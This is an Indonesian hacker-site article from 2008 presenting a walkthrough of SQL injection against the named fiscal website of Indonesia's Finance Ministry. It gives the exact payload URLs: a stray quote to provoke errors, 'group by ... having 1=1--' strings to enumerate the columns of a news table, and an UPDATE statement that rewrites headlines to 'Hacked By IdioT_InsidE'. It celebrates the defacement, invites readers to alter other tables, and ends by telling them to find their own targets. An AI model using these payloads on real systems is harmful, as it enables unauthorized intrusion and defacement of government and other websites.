<(o)-(Back)--<

 

WWW.SPYROZONE.NET

 

 
[242]. STUDI KASUS KELEMAHAN PADA SITUS DEPARTEMEN KEUANGAN RI

 

 

 

  

-----------------------------------------------------------------------------------

Author  : Dimas Aditya

Contact : adam.john22@yahoo.com

CopyLEFT (c) 2008 www.spyrozone.net All Rights Reserved

16/04/2008 20.02.45 WIB

-----------------------------------------------------------------------------------

 

 

  

Belakangan tersiar kabar yang cukup santer terdengar tentang beberapa cracker yang mendeface beberapa website dalam negeri yang bergerak di sector perekonomian. Adalah Bank Indonesia dan Bank Niaga yang menjadi korban ‘pelucutan pakaian secara paksa’ oleh para dedemit maya. Sebagian serangan dilakukan tanpa tujuan yang jelas, namun tidak yang terjadi pada website Bank Niaga yang beralamat di http://www.bankniaga.com. Aksi pendefacean yang dilakukan cracker tersebut ditujukan pada pakar telematika Indonesia yang terkemuka, tapi sudahlah itu bukan urusan saya, karena saya hanya pengamat sejati yang kerjanya hanya menonton dan menonton saja.



Sangatlah memprihatinkan ketika sebuah instansi pemerintah atau instansi perbankan ‘dapat’ dimasuki dengan ‘sesuka hati’ oleh orang yang tidak berkepentingan sama sekali terhadap instansi tersebut. Yang lebih memprihatinkan adalah ketika bugs lama yang sudah berumur cukup uzur di luar sana masih sangat signifikan terjadi dan bahkan sangat ‘bekerja’ pada website-website krusial di Indonesia. Sebut saja tragedy pendefacean Bank Indonesia, Bank Niaga dan Departemen Keuangan Republik Indonesia yang beralamat di http://www.depkeu.go.id.


Oke kita langsung pada materi saja. Pada praktek kali ini kita menggunakan website fiscal depkeu yang beralamat http://www.fiskal.depkeu.go.id Pada halaman situs tersebut ada kolom berita, kita klik untuk melihat berita tersebut (sok rajin :p) setelah keluar url-nya, url tersebut akan menjadi seperti ini:

 

http://www.fiskal.depkeu.go.id/webbkf/info/detailinfo.asp?NewsID=N131616694

 

Kita coba menambahkan tanda petik di akhir url tersebut, maka menjadi:

 

http://www.fiskal.depkeu.go.id/webbkf/info/detailinfo.asp?NewsID=N131616694’

 

dan lihat.. wow.. menakjubkan.. ada error yang keluar (tulisan errornya liat sendiri ya di websitenya :p) langkah selanjutnya kita tambahkan beberapa kata dan symbol dibelakang url tadi, tulis “+having+1=1” (tanpa tanda petik). Tutup mata kalian dengan amat sangat mengharap ada tulisan error “unik” yang keluar (jangan lupa berdoa kepada Tuhan ya) dan beberapa menit kemudian (maklum, koneksi yang saya pakain sangat lambat :p) wow.. ada error “unik” yang keluar. Yang bikin unik adalah kalimat yang berada dalam tanda petik (field) contohnya seperti ini ‘tberita.Nomor’. mungkin bagi kalian yang sudah mengetahui ini, saya tidak menganjurkan kalian untuk terus membacanya. Bagi yang belum mengerti itu artinya adalah, ada table yang bernama tberita.Nomor dalam website tersebut, dan ada kemungkinan besar kita dapat mengupdate tulisan pada website tersebut. Keluarkan semua table yang ada dari error tersebut dengan cara:

 

http://www.fiskal.depkeu.go.id/webbkf/info/detailinfo.asp?

NewsID=N131616694'+group+by+tberita.Nomor+having+1=1--

 

Setelah kita klik link tersebut maka akan keluar error lagi yang diiringi dengan table selanjutnya. Terus keluarkan hingga menjadi seperti ini :

 

 

http://www.fiskal.depkeu.go.id/webbkf/info/detailinfo.asp?

NewsID=N131616694'+group+by+tberita.Nomor,tberita.NewsId,tberita.Tanggal,tberita.Waktu,

tberita.Judul,tberita.Head,tberita.Isi+having+1=1--

 

itu artinya ada sekitar 7 table yang bias kita update dalam website tersebut. Dan cara mengupdatenya adalah seperti ini :

 

http://www.fiskal.depkeu.go.id/webbkf/info/detailinfo.asp?

NewsID=N131616694'+update+tberita+set+Judul=’Hacked+By+IdioT_InsidE’;--
 

Apa yang terjadi?... buka website yang tadi http://www.fiskal.depkeu.go.id dan apa yang terjadi?..wow pada halaman berita fiscal judul berita tersebut tertulis Hakced By IdioT_InsidE. Lucu ya..mengingat ini adalah website yang cukup krusial di sector perekonomian (hehehhe sok tau ya saya). Masih kurang?..silahkan update table-table yang lain. Dan ini merupakan ‘pukulan’ keras bagi sang admin, mengapa? Saya yakin kalian punya persepsi akan pertanyaan yang saya ajukan tersebut.



Nah akhirnya kita sudah kan bagaimana website pemerintah itu dapat di update ‘sesuka hati’ ?...itulah yang terjadi pada bank niaga dan beberapa website yang bergerak disektor perekonomian Negara kita beberapa waktu lalu.


Ok sekian dari saya, terima kasih untuk SPYRO KiD, sekarang saatnya saya bekerja dibidang yang lain (kuliah ?) maklum aja saya lagi skripsi (aslinya ni skripsi ga kelar-kelar, minta doanya ya, sekalian semoga matakuliah teknik penulisan skripsi saya dapet nilai A ? )

Nb : saat catatan ini dibuat saya sudah confirmasi pada pihak depkeu agar ‘lobangnya’ ditutup, jadi jangan heran kalo ntar dicoba web-nya sudah berubah bentuk. Cari target sendiri ya..


“keep on spirit and happy hacking”    


 

/* ------------------------------|EOF|------------------------------ */

 

  <(o)-(Back)--<   

 WWW.SPYROZONE.NET